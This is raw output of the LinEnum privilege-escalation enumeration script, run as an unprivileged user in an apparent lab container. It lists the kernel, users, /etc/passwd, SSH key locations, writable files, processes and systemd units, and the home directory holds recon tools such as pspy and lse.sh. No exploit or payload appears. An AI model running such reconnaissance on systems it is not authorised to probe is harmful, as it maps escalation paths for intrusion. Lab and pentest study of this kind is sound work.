
[00;31m#########################################################[00m
[00;31m#[00m [00;33mLocal Linux Enumeration & Privilege Escalation Script[00m [00;31m#[00m
[00;31m#########################################################[00m
[00;33m# www.rebootuser.com[00m
[00;33m# version 0.981[00m

[-] Debug Info
[+] Thorough tests = Enabled


[00;33mScan started at:
Sat May  2 04:53:02 UTC 2020
[00m

[00;33m### SYSTEM ##############################################[00m
[00;31m[-] Kernel information:[00m
Linux aeb4525789d8 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64 GNU/Linux


[00;31m[-] Kernel information (continued):[00m
Linux version 4.19.0-8-amd64 (debian-kernel@lists.debian.org) (gcc version 8.3.0 (Debian 8.3.0-6)) #1 SMP Debian 4.19.98-1 (2020-01-26)


[00;31m[-] Specific release information:[00m
PRETTY_NAME="Debian GNU/Linux 10 (buster)"
NAME="Debian GNU/Linux"
VERSION_ID="10"
VERSION="10 (buster)"
VERSION_CODENAME=buster
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"


[00;31m[-] Hostname:[00m
aeb4525789d8


[00;33m### USER/GROUP ##########################################[00m
[00;31m[-] Current user/group info:[00m
uid=1000(qtc) gid=1000(qtc) groups=1000(qtc)


[00;31m[-] Users that have previously logged onto the system:[00m
Username         Port     From             Latest
qtc              pts/1    172.18.0.1       Fri May  1 20:08:26 +0000 2020


[00;31m[-] Who else is logged on:[00m
 04:53:02 up 1 day, 21 min,  1 user,  load average: 0.07, 0.02, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
qtc      pts/0    172.18.0.1       Fri05    6.00s  0.17s  0.00s /bin/bash ./le.sh -t


[00;31m[-] Group memberships:[00m
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=101(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=102(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=103(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=104(messagebus) gid=105(messagebus) groups=105(messagebus)
uid=105(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=1000(qtc) gid=1000(qtc) groups=1000(qtc)


[00;31m[-] Contents of /etc/passwd:[00m
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:105::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
qtc:x:1000:1000:,,,:/home/qtc:/bin/bash


[00;31m[-] Super user account(s):[00m
root


[00;31m[-] Are permissions on /home directories lax:[00m
total 16K
drwxr-xr-x 1 root root 4.0K Feb 11 17:37 .
drwxr-xr-x 1 root root 4.0K Feb 25 12:33 ..
drwxr-xr-x 1 qtc  qtc  4.0K May  2 04:52 qtc


[00;31m[-] Files not owned by user but writable by group:[00m
srw-rw-rw- 1 root root 0 May  1 04:31 /run/dbus/system_bus_socket
-rw-rw-rw- 1 root root 0 May  2 04:53 /code/urls.txt


[00;31m[-] Files owned by our user:[00m
-rw-r--r-- 1 qtc qtc 220 Feb 11 17:37 /home/qtc/.bash_logout
-rw-r--r-- 1 qtc qtc 807 Feb 11 17:37 /home/qtc/.profile
-rw-r--r-- 1 qtc qtc 3526 Feb 11 17:37 /home/qtc/.bashrc
-r-------- 1 qtc qtc 568 Feb 11 17:34 /home/qtc/.ssh/authorized_keys
-rw-r--r-- 1 qtc qtc 741886 May  1 22:56 /home/qtc/code.tar.gz
-rwxr-xr-x 1 qtc qtc 1156536 May  1 06:48 /home/qtc/pspy64s
-rwxr-xr-x 1 qtc qtc 46476 May  2 04:50 /home/qtc/le.sh
-rw-r--r-- 1 qtc qtc 51337 May  1 23:03 /home/qtc/le-qtc-docker
-rw-r--r-- 1 qtc qtc 27 May  1 23:26 /home/qtc/test/test.py
-rwxr-xr-x 1 qtc qtc 35258 May  1 05:11 /home/qtc/lse.sh
-rw------- 1 qtc qtc 167 May  1 21:06 /home/qtc/.bash_history
-rw-r--r-- 1 qtc qtc 4833 May  2 04:53 /home/qtc/le-qtc
-rwxr-xr-x 1 qtc qtc 1200696 May  1 21:06 /home/qtc/vi


[00;31m[-] Hidden files:[00m
-rw-r--r-- 1 root root 220 Apr 18  2019 /etc/skel/.bash_logout
-rw-r--r-- 1 root root 807 Apr 18  2019 /etc/skel/.profile
-rw-r--r-- 1 root root 3526 Apr 18  2019 /etc/skel/.bashrc
-rw------- 1 root root 0 Jan 30 00:00 /etc/.pwd.lock
-rw-r--r-- 1 qtc qtc 220 Feb 11 17:37 /home/qtc/.bash_logout
-rw-r--r-- 1 qtc qtc 807 Feb 11 17:37 /home/qtc/.profile
-rw-r--r-- 1 qtc qtc 3526 Feb 11 17:37 /home/qtc/.bashrc
-rw------- 1 qtc qtc 167 May  1 21:06 /home/qtc/.bash_history
-rwxr-xr-x 1 root root 0 Feb 25 12:33 /.dockerenv


[00;31m[-] World-readable files within /home:[00m
-rw-r--r-- 1 qtc qtc 220 Feb 11 17:37 /home/qtc/.bash_logout
-rw-r--r-- 1 qtc qtc 807 Feb 11 17:37 /home/qtc/.profile
-rw-r--r-- 1 qtc qtc 3526 Feb 11 17:37 /home/qtc/.bashrc
-rw-r--r-- 1 qtc qtc 741886 May  1 22:56 /home/qtc/code.tar.gz
-rwxr-xr-x 1 qtc qtc 1156536 May  1 06:48 /home/qtc/pspy64s
-rwxr-xr-x 1 qtc qtc 46476 May  2 04:50 /home/qtc/le.sh
-rw-r--r-- 1 qtc qtc 51337 May  1 23:03 /home/qtc/le-qtc-docker
-rw-r--r-- 1 qtc qtc 27 May  1 23:26 /home/qtc/test/test.py
-rwxr-xr-x 1 qtc qtc 35258 May  1 05:11 /home/qtc/lse.sh
-rw-r--r-- 1 qtc qtc 6208 May  2 04:53 /home/qtc/le-qtc
-rwxr-xr-x 1 qtc qtc 1200696 May  1 21:06 /home/qtc/vi


[00;31m[-] Home directory contents:[00m
total 3.2M
drwxr-xr-x 1 qtc  qtc  4.0K May  2 04:52 .
drwxr-xr-x 1 root root 4.0K Feb 11 17:37 ..
-rw------- 1 qtc  qtc   167 May  1 21:06 .bash_history
-rw-r--r-- 1 qtc  qtc   220 Feb 11 17:37 .bash_logout
-rw-r--r-- 1 qtc  qtc  3.5K Feb 11 17:37 .bashrc
-rw-r--r-- 1 qtc  qtc   807 Feb 11 17:37 .profile
drwx------ 1 qtc  qtc  4.0K Feb 11 17:38 .ssh
-rw-r--r-- 1 qtc  qtc  725K May  1 22:56 code.tar.gz
-rw-r--r-- 1 qtc  qtc  6.8K May  2 04:53 le-qtc
-rw-r--r-- 1 qtc  qtc   51K May  1 23:03 le-qtc-docker
-rwxr-xr-x 1 qtc  qtc   46K May  2 04:50 le.sh
-rwxr-xr-x 1 qtc  qtc   35K May  1 05:11 lse.sh
-rwxr-xr-x 1 qtc  qtc  1.2M May  1 06:48 pspy64s
drwxr-xr-x 2 qtc  qtc  4.0K May  1 23:27 test
-rwxr-xr-x 1 qtc  qtc  1.2M May  1 21:06 vi


[00;31m[-] SSH keys/host information found in the following locations:[00m
-r-------- 1 qtc qtc 568 Feb 11 17:34 /home/qtc/.ssh/authorized_keys
-r-------- 1 root root 568 Feb 11 17:34 /code/authorized_keys


[00;33m### ENVIRONMENTAL #######################################[00m
[00;31m[-] Environment information:[00m
SHELL=/bin/bash
PWD=/home/qtc
LOGNAME=qtc
HOME=/home/qtc
LANG=en_US.UTF-8
SSH_CONNECTION=172.18.0.1 39740 172.18.0.4 22
TERM=xterm-256color
USER=qtc
SHLVL=1
SSH_CLIENT=172.18.0.1 39740 22
PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
MAIL=/var/mail/qtc
SSH_TTY=/dev/pts/0
OLDPWD=/usr/local/lib/python3.7
_=/usr/bin/env


[00;31m[-] Path information:[00m
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
drwxr-xr-x 1 root root  4096 Feb 11 17:37 /bin
drwxr-xr-x 1 root root 12288 Feb 11 17:37 /usr/bin
drwxr-xr-x 2 root root  4096 Nov 10 12:17 /usr/games
drwxr-xr-x 1 root root  4096 Feb 11 17:39 /usr/local/bin
drwxr-xr-x 2 root root  4096 Jan 30 00:00 /usr/local/games


[00;31m[-] Available shells:[00m
# /etc/shells: valid login shells
/bin/sh
/bin/bash
/bin/rbash
/bin/dash


[00;31m[-] Current umask value:[00m
0022
u=rwx,g=rx,o=rx


[00;31m[-] umask value as specified in /etc/login.defs:[00m
UMASK		022


[00;31m[-] Password and storage information:[00m
PASS_MAX_DAYS	99999
PASS_MIN_DAYS	0
PASS_WARN_AGE	7
ENCRYPT_METHOD SHA512


[00;33m### JOBS/TASKS ##########################################[00m
[00;31m[-] Cron jobs:[00m
total 20
drwxr-xr-x 2 root root 4096 Jan 30 00:00 .
drwxr-xr-x 1 root root 4096 Feb 25 12:33 ..
-rwxr-xr-x 1 root root 1478 May 28  2019 apt-compat
-rwxr-xr-x 1 root root 1187 Apr 19  2019 dpkg
-rwxr-xr-x 1 root root  249 Sep 27  2017 passwd


[00;33m### NETWORKING  ##########################################[00m
[00;31m[-] Nameserver(s):[00m
nameserver 127.0.0.11


[00;33m### SERVICES #############################################[00m
[00;31m[-] Running processes:[00m
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.0   5488  3100 ?        Ss   May01   0:00 /bin/bash ./start.sh
root        14  0.0  0.1  15852  4228 ?        Ss   May01   0:00 /usr/sbin/sshd
root        27  0.0  0.0  10476   844 ?        Ss   May01   0:00 nginx: master process /usr/sbin/nginx
www-data    28  0.0  1.1  57492 46804 ?        S    May01   0:05 uwsgi --ini uwsgi.ini --chmod-sock=666
www-data    29  0.0  0.0  11264  3840 ?        S    May01   0:00 nginx: worker process
www-data    30  0.0  0.0  11264  3904 ?        S    May01   0:00 nginx: worker process
www-data    31  0.0  1.1  68368 46160 ?        S    May01   0:00 uwsgi --ini uwsgi.ini --chmod-sock=666
www-data    32  0.0  0.9  57492 37288 ?        S    May01   0:00 uwsgi --ini uwsgi.ini --chmod-sock=666
www-data    33  0.0  1.1  68224 45828 ?        S    May01   0:00 uwsgi --ini uwsgi.ini --chmod-sock=666
www-data    34  0.0  0.9  57748 40224 ?        S    May01   0:00 uwsgi --ini uwsgi.ini --chmod-sock=666
www-data    35  0.0  1.0  57884 40444 ?        S    May01   0:00 uwsgi --ini uwsgi.ini --chmod-sock=666
www-data    36  0.0  1.1  68384 45840 ?        S    May01   0:00 uwsgi --ini uwsgi.ini --chmod-sock=666
www-data    37  0.0  1.1  69652 47808 ?        S    May01   0:00 uwsgi --ini uwsgi.ini --chmod-sock=666
www-data    38  0.0  1.1  68180 46268 ?        S    May01   0:00 uwsgi --ini uwsgi.ini --chmod-sock=666
www-data    39  0.0  1.1  70404 47896 ?        S    May01   0:00 uwsgi --ini uwsgi.ini --chmod-sock=666
www-data    40  0.0  1.2  70364 49064 ?        S    May01   0:00 uwsgi --ini uwsgi.ini --chmod-sock=666
root        66  0.0  0.1  16884  8044 ?        Ss   May01   0:00 sshd: qtc [priv]
qtc         72  0.0  0.1  16884  4952 ?        S    May01   0:00 sshd: qtc@pts/0
qtc         73  0.0  0.0   4000  3404 pts/0    Ss   May01   0:00 -bash
qtc       3106  0.0  0.0   4444  3588 pts/0    S+   04:53   0:00 /bin/bash ./le.sh -t
qtc       3107  0.3  0.0   4576  3376 pts/0    S+   04:53   0:00 /bin/bash ./le.sh -t
qtc       3108  0.0  0.0   2300   680 pts/0    S+   04:53   0:00 tee -a
qtc       3306  0.0  0.0   4576  2688 pts/0    S+   04:53   0:00 /bin/bash ./le.sh -t
qtc       3307  0.0  0.0   7640  2752 pts/0    R+   04:53   0:00 ps aux


[00;31m[-] Process binaries and associated permissions (from above list):[00m
1.2M -rwxr-xr-x 1 root root 1.2M Apr 18  2019 /bin/bash
792K -rwxr-xr-x 1 root root 789K Jan 31 20:55 /usr/sbin/sshd


[00;31m[-] /etc/init.d/ binary permissions:[00m
total 32
drwxr-xr-x 1 root root 4096 Feb 11 17:37 .
drwxr-xr-x 1 root root 4096 Feb 25 12:33 ..
-rwxr-xr-x 1 root root 2813 Jun  9  2019 dbus
-rwxr-xr-x 1 root root 3809 Jan 10  2019 hwclock.sh
-rwxr-xr-x 1 root root 4579 Aug 13  2019 nginx
-rwxr-xr-x 1 root root  924 May 31  2018 procps
-rwxr-xr-x 1 root root 3939 Jan 31 20:55 ssh


[00;31m[-] /lib/systemd/* config file permissions:[00m
/lib/systemd/:
total 7.4M
drwxr-xr-x 1 root root  12K Feb 11 17:37 system
drwxr-xr-x 2 root root 4.0K Feb 11 17:37 network
drwxr-xr-x 2 root root 4.0K Feb 11 17:37 system-generators
drwxr-xr-x 2 root root 4.0K Feb 11 17:37 system-preset
-rw-r--r-- 1 root root 2.6M Jan 29 18:07 libsystemd-shared-241.so
drwxr-xr-x 2 root root 4.0K Jan 29 18:07 system-shutdown
drwxr-xr-x 2 root root 4.0K Jan 29 18:07 system-sleep
-rwxr-xr-x 1 root root 1.5M Jan 29 18:07 systemd
-rwxr-xr-x 1 root root  15K Jan 29 18:07 systemd-ac-power
-rwxr-xr-x 1 root root  22K Jan 29 18:07 systemd-backlight
-rwxr-xr-x 1 root root  15K Jan 29 18:07 systemd-binfmt
-rwxr-xr-x 1 root root  27K Jan 29 18:07 systemd-bless-boot
-rwxr-xr-x 1 root root  15K Jan 29 18:07 systemd-boot-check-no-failures
-rwxr-xr-x 1 root root  14K Jan 29 18:07 systemd-cgroups-agent
-rwxr-xr-x 1 root root  31K Jan 29 18:07 systemd-cryptsetup
-rwxr-xr-x 1 root root  19K Jan 29 18:07 systemd-dissect
-rwxr-xr-x 1 root root  26K Jan 29 18:07 systemd-fsck
-rwxr-xr-x 1 root root  27K Jan 29 18:07 systemd-fsckd
-rwxr-xr-x 1 root root  19K Jan 29 18:07 systemd-growfs
-rwxr-xr-x 1 root root  14K Jan 29 18:07 systemd-hibernate-resume
-rwxr-xr-x 1 root root  31K Jan 29 18:07 systemd-hostnamed
-rwxr-xr-x 1 root root  19K Jan 29 18:07 systemd-initctl
-rwxr-xr-x 1 root root 143K Jan 29 18:07 systemd-journald
-rwxr-xr-x 1 root root  39K Jan 29 18:07 systemd-localed
-rwxr-xr-x 1 root root 227K Jan 29 18:07 systemd-logind
-rwxr-xr-x 1 root root  14K Jan 29 18:07 systemd-makefs
-rwxr-xr-x 1 root root  19K Jan 29 18:07 systemd-modules-load
-rwxr-xr-x 1 root root 1.8M Jan 29 18:07 systemd-networkd
-rwxr-xr-x 1 root root  27K Jan 29 18:07 systemd-networkd-wait-online
-rwxr-xr-x 1 root root  15K Jan 29 18:07 systemd-quotacheck
-rwxr-xr-x 1 root root  14K Jan 29 18:07 systemd-random-seed
-rwxr-xr-x 1 root root  19K Jan 29 18:07 systemd-remount-fs
-rwxr-xr-x 1 root root  14K Jan 29 18:07 systemd-reply-password
-rwxr-xr-x 1 root root 399K Jan 29 18:07 systemd-resolved
-rwxr-xr-x 1 root root  23K Jan 29 18:07 systemd-rfkill
-rwxr-xr-x 1 root root  51K Jan 29 18:07 systemd-shutdown
-rwxr-xr-x 1 root root  27K Jan 29 18:07 systemd-sleep
-rwxr-xr-x 1 root root  31K Jan 29 18:07 systemd-socket-proxyd
-rwxr-xr-x 1 root root  14K Jan 29 18:07 systemd-sulogin-shell
-rwxr-xr-x 1 root root  23K Jan 29 18:07 systemd-sysctl
-rwxr-xr-x 1 root root 1.4K Jan 29 18:07 systemd-sysv-install
-rwxr-xr-x 1 root root  14K Jan 29 18:07 systemd-time-wait-sync
-rwxr-xr-x 1 root root  39K Jan 29 18:07 systemd-timedated
-rwxr-xr-x 1 root root  55K Jan 29 18:07 systemd-timesyncd
-rwxr-xr-x 1 root root  15K Jan 29 18:07 systemd-update-utmp
-rwxr-xr-x 1 root root  18K Jan 29 18:07 systemd-user-runtime-dir
-rwxr-xr-x 1 root root  14K Jan 29 18:07 systemd-user-sessions
-rwxr-xr-x 1 root root  15K Jan 29 18:07 systemd-veritysetup
-rwxr-xr-x 1 root root  14K Jan 29 18:07 systemd-volatile-root
-rw-r--r-- 1 root root  692 Feb 14  2019 resolv.conf

/lib/systemd/system:
total 668K
drwxr-xr-x 2 root root 4.0K Feb 11 17:37 multi-user.target.wants
drwxr-xr-x 2 root root 4.0K Feb 11 17:37 sockets.target.wants
drwxr-xr-x 2 root root 4.0K Feb 11 17:37 getty.target.wants
drwxr-xr-x 2 root root 4.0K Feb 11 17:37 graphical.target.wants
drwxr-xr-x 2 root root 4.0K Feb 11 17:37 local-fs.target.wants
drwxr-xr-x 2 root root 4.0K Feb 11 17:37 rc-local.service.d
drwxr-xr-x 2 root root 4.0K Feb 11 17:37 rescue.target.wants
drwxr-xr-x 2 root root 4.0K Feb 11 17:37 sysinit.target.wants
drwxr-xr-x 2 root root 4.0K Feb 11 17:37 systemd-resolved.service.d
drwxr-xr-x 2 root root 4.0K Feb 11 17:37 systemd-timesyncd.service.d
drwxr-xr-x 2 root root 4.0K Feb 11 17:37 timers.target.wants
drwxr-xr-x 2 root root 4.0K Feb 11 17:37 user-.slice.d
-rw-r--r-- 1 root root  184 Jan 31 20:55 rescue-ssh.target
-rw-r--r-- 1 root root  538 Jan 31 20:55 ssh.service
-rw-r--r-- 1 root root  216 Jan 31 20:55 ssh.socket
-rw-r--r-- 1 root root  289 Jan 31 20:55 ssh@.service
lrwxrwxrwx 1 root root   14 Jan 29 18:07 autovt@.service -> getty@.service
lrwxrwxrwx 1 root root    9 Jan 29 18:07 bootlogd.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jan 29 18:07 bootlogs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jan 29 18:07 bootmisc.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jan 29 18:07 checkfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jan 29 18:07 checkroot-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jan 29 18:07 checkroot.service -> /dev/null
-rw-r--r-- 1 root root 1.1K Jan 29 18:07 console-getty.service
-rw-r--r-- 1 root root 1.3K Jan 29 18:07 container-getty@.service
lrwxrwxrwx 1 root root    9 Jan 29 18:07 cryptdisks-early.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jan 29 18:07 cryptdisks.service -> /dev/null
lrwxrwxrwx 1 root root   13 Jan 29 18:07 ctrl-alt-del.target -> reboot.target
lrwxrwxrwx 1 root root   25 Jan 29 18:07 dbus-org.freedesktop.hostname1.service -> systemd-hostnamed.service
lrwxrwxrwx 1 root root   23 Jan 29 18:07 dbus-org.freedesktop.locale1.service -> systemd-localed.service
lrwxrwxrwx 1 root root   22 Jan 29 18:07 dbus-org.freedesktop.login1.service -> systemd-logind.service
lrwxrwxrwx 1 root root   25 Jan 29 18:07 dbus-org.freedesktop.timedate1.service -> systemd-timedated.service
-rw-r--r-- 1 root root 1.1K Jan 29 18:07 debug-shell.service
lrwxrwxrwx 1 root root   16 Jan 29 18:07 default.target -> graphical.target
-rw-r--r-- 1 root root  797 Jan 29 18:07 emergency.service
-rw-r--r-- 1 root root  342 Jan 29 18:07 getty-static.service
-rw-r--r-- 1 root root 2.0K Jan 29 18:07 getty@.service
lrwxrwxrwx 1 root root    9 Jan 29 18:07 halt.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jan 29 18:07 hostname.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jan 29 18:07 hwclock.service -> /dev/null
-rw-r--r-- 1 root root  670 Jan 29 18:07 initrd-cleanup.service
-rw-r--r-- 1 root root  830 Jan 29 18:07 initrd-parse-etc.service
-rw-r--r-- 1 root root  589 Jan 29 18:07 initrd-switch-root.service
-rw-r--r-- 1 root root  704 Jan 29 18:07 initrd-udevadm-cleanup-db.service
lrwxrwxrwx 1 root root    9 Jan 29 18:07 killprocs.service -> /dev/null
-rw-r--r-- 1 root root  717 Jan 29 18:07 kmod-static-nodes.service
lrwxrwxrwx 1 root root   28 Jan 29 18:07 kmod.service -> systemd-modules-load.service
lrwxrwxrwx 1 root root   28 Jan 29 18:07 module-init-tools.service -> systemd-modules-load.service
lrwxrwxrwx 1 root root    9 Jan 29 18:07 motd.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jan 29 18:07 mountall-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jan 29 18:07 mountall.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jan 29 18:07 mountdevsubfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jan 29 18:07 mountkernfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jan 29 18:07 mountnfs-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jan 29 18:07 mountnfs.service -> /dev/null
lrwxrwxrwx 1 root root   22 Jan 29 18:07 procps.service -> systemd-sysctl.service
-rw-r--r-- 1 root root  609 Jan 29 18:07 quotaon.service
-rw-r--r-- 1 root root  716 Jan 29 18:07 rc-local.service
lrwxrwxrwx 1 root root   16 Jan 29 18:07 rc.local.service -> rc-local.service
lrwxrwxrwx 1 root root    9 Jan 29 18:07 rc.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jan 29 18:07 rcS.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jan 29 18:07 reboot.service -> /dev/null
-rw-r--r-- 1 root root  788 Jan 29 18:07 rescue.service
lrwxrwxrwx 1 root root    9 Jan 29 18:07 rmnologin.service -> /dev/null
lrwxrwxrwx 1 root root   15 Jan 29 18:07 runlevel0.target -> poweroff.target
lrwxrwxrwx 1 root root   13 Jan 29 18:07 runlevel1.target -> rescue.target
drwxr-xr-x 2 root root 4.0K Jan 29 18:07 runlevel1.target.wants
lrwxrwxrwx 1 root root   17 Jan 29 18:07 runlevel2.target -> multi-user.target
drwxr-xr-x 2 root root 4.0K Jan 29 18:07 runlevel2.target.wants
lrwxrwxrwx 1 root root   17 Jan 29 18:07 runlevel3.target -> multi-user.target
drwxr-xr-x 2 root root 4.0K Jan 29 18:07 runlevel3.target.wants
lrwxrwxrwx 1 root root   17 Jan 29 18:07 runlevel4.target -> multi-user.target
drwxr-xr-x 2 root root 4.0K Jan 29 18:07 runlevel4.target.wants
lrwxrwxrwx 1 root root   16 Jan 29 18:07 runlevel5.target -> graphical.target
drwxr-xr-x 2 root root 4.0K Jan 29 18:07 runlevel5.target.wants
lrwxrwxrwx 1 root root   13 Jan 29 18:07 runlevel6.target -> reboot.target
lrwxrwxrwx 1 root root    9 Jan 29 18:07 sendsigs.service -> /dev/null
-rw-r--r-- 1 root root 1.5K Jan 29 18:07 serial-getty@.service
lrwxrwxrwx 1 root root    9 Jan 29 18:07 single.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jan 29 18:07 stop-bootlogd-single.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jan 29 18:07 stop-bootlogd.service -> /dev/null
-rw-r--r-- 1 root root  742 Jan 29 18:07 systemd-ask-password-console.service
-rw-r--r-- 1 root root  752 Jan 29 18:07 systemd-ask-password-wall.service
-rw-r--r-- 1 root root  752 Jan 29 18:07 systemd-backlight@.service
-rw-r--r-- 1 root root 1.1K Jan 29 18:07 systemd-binfmt.service
-rw-r--r-- 1 root root  678 Jan 29 18:07 systemd-bless-boot.service
-rw-r--r-- 1 root root  718 Jan 29 18:07 systemd-boot-check-no-failures.service
-rw-r--r-- 1 root root  740 Jan 29 18:07 systemd-fsck-root.service
-rw-r--r-- 1 root root  741 Jan 29 18:07 systemd-fsck@.service
-rw-r--r-- 1 root root  551 Jan 29 18:07 systemd-fsckd.service
-rw-r--r-- 1 root root  540 Jan 29 18:07 systemd-fsckd.socket
-rw-r--r-- 1 root root  584 Jan 29 18:07 systemd-halt.service
-rw-r--r-- 1 root root  671 Jan 29 18:07 systemd-hibernate-resume@.service
-rw-r--r-- 1 root root  541 Jan 29 18:07 systemd-hibernate.service
-rw-r--r-- 1 root root 1.1K Jan 29 18:07 systemd-hostnamed.service
-rw-r--r-- 1 root root  559 Jan 29 18:07 systemd-hybrid-sleep.service
-rw-r--r-- 1 root root  566 Jan 29 18:07 systemd-initctl.service
-rw-r--r-- 1 root root  735 Jan 29 18:07 systemd-journal-flush.service
-rw-r--r-- 1 root root 1.5K Jan 29 18:07 systemd-journald.service
-rw-r--r-- 1 root root  597 Jan 29 18:07 systemd-kexec.service
-rw-r--r-- 1 root root 1.1K Jan 29 18:07 systemd-localed.service
-rw-r--r-- 1 root root 1.5K Jan 29 18:07 systemd-logind.service
-rw-r--r-- 1 root root  733 Jan 29 18:07 systemd-machine-id-commit.service
-rw-r--r-- 1 root root 1007 Jan 29 18:07 systemd-modules-load.service
-rw-r--r-- 1 root root  740 Jan 29 18:07 systemd-networkd-wait-online.service
-rw-r--r-- 1 root root 1.9K Jan 29 18:07 systemd-networkd.service
-rw-r--r-- 1 root root  655 Jan 29 18:07 systemd-quotacheck.service
-rw-r--r-- 1 root root  792 Jan 29 18:07 systemd-random-seed.service
-rw-r--r-- 1 root root  798 Jan 29 18:07 systemd-remount-fs.service
-rw-r--r-- 1 root root 1.7K Jan 29 18:07 systemd-resolved.service
-rw-r--r-- 1 root root  744 Jan 29 18:07 systemd-rfkill.service
-rw-r--r-- 1 root root  596 Jan 29 18:07 systemd-suspend-then-hibernate.service
-rw-r--r-- 1 root root  537 Jan 29 18:07 systemd-suspend.service
-rw-r--r-- 1 root root  693 Jan 29 18:07 systemd-sysctl.service
-rw-r--r-- 1 root root  700 Jan 29 18:07 systemd-sysusers.service
-rw-r--r-- 1 root root 1.2K Jan 29 18:07 systemd-time-wait-sync.service
-rw-r--r-- 1 root root 1.1K Jan 29 18:07 systemd-timedated.service
-rw-r--r-- 1 root root 1.4K Jan 29 18:07 systemd-timesyncd.service
-rw-r--r-- 1 root root  659 Jan 29 18:07 systemd-tmpfiles-clean.service
-rw-r--r-- 1 root root  732 Jan 29 18:07 systemd-tmpfiles-setup-dev.service
-rw-r--r-- 1 root root  772 Jan 29 18:07 systemd-tmpfiles-setup.service
-rw-r--r-- 1 root root  797 Jan 29 18:07 systemd-update-utmp-runlevel.service
-rw-r--r-- 1 root root  794 Jan 29 18:07 systemd-update-utmp.service
-rw-r--r-- 1 root root  628 Jan 29 18:07 systemd-user-sessions.service
-rw-r--r-- 1 root root  690 Jan 29 18:07 systemd-volatile-root.service
lrwxrwxrwx 1 root root    9 Jan 29 18:07 umountfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jan 29 18:07 umountnfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jan 29 18:07 umountroot.service -> /dev/null
lrwxrwxrwx 1 root root   27 Jan 29 18:07 urandom.service -> systemd-random-seed.service
-rw-r--r-- 1 root root  688 Jan 29 18:07 user-runtime-dir@.service
-rw-r--r-- 1 root root  729 Jan 29 18:07 user@.service
lrwxrwxrwx 1 root root    9 Jan 29 18:07 x11-common.service -> /dev/null
-rw-r--r-- 1 root root 1.1K Aug 13  2019 nginx.service
-rw-r--r-- 1 root root  380 Jun  9  2019 dbus.service
-rw-r--r-- 1 root root  106 Jun  9  2019 dbus.socket
-rw-r--r-- 1 root root  389 May 28  2019 apt-daily-upgrade.service
-rw-r--r-- 1 root root  184 May 28  2019 apt-daily-upgrade.timer
-rw-r--r-- 1 root root  326 May 28  2019 apt-daily.service
